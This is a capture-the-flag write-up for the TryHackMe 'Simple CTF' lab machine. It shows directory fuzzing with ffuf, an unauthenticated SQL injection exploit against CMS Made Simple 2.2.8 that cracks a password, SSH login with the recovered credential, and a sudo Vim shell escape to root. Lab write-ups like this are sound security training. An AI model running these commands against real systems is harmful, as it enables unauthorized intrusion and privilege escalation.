TryHackMe - Simple CTF (Easy)
{"author" : ["ret2basic"]}

Summary

FFUF finds a /simple directory on port 80 which hosts CMS Made Simple 2.2.8. This service has an unauthenticated SQL injection exploit. The exploit finds a SSH credential for us and we can SSH in to get a user shell.
In the privilege escalation phase, we find we are able to run Vim as root from sudo -l. Use a payload from GTFOBins to get a root shell.

IP

    RHOST: 10.10.74.168
    LHOST: 10.13.12.2

Nmap

Nmap

FFUF

Run FFUF:
1
$ ffuf -u http://10.10.74.168/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.html,.txt -fc 400,401,403
Copied!
FFUF finds /robots.txt and /simple:
FFUF

User Shell: CMS Made Simple 2.2.8 Unauthenticated SQL Injection

Version number is leaked on /simple:
CMS Made Simple version 2.2.8
Searchsploit:
Searchsploit
Install termcolor:
1
$ python2 -m pip install termcolor
Copied!
Run the exploit:
1
$ ./sqli.py -u http://10.10.74.168/simple --crack -w /usr/share/wordlists/rockyou.txt
Copied!
The exploit finds a credential mitch:secret:
Credential
Try SSH in:
1
$ ssh [email protected] -p 2222
Copied!
Now we have a user shell:
User shell

Privilege Escalation: Sudo Vim

sudo -l:
sudo -l
Use the payload from GTFOBins:
1
$ sudo vim -c ':!/bin/sh'
Copied!
Now we have a root shell:
root shell
Last modified 2mo ago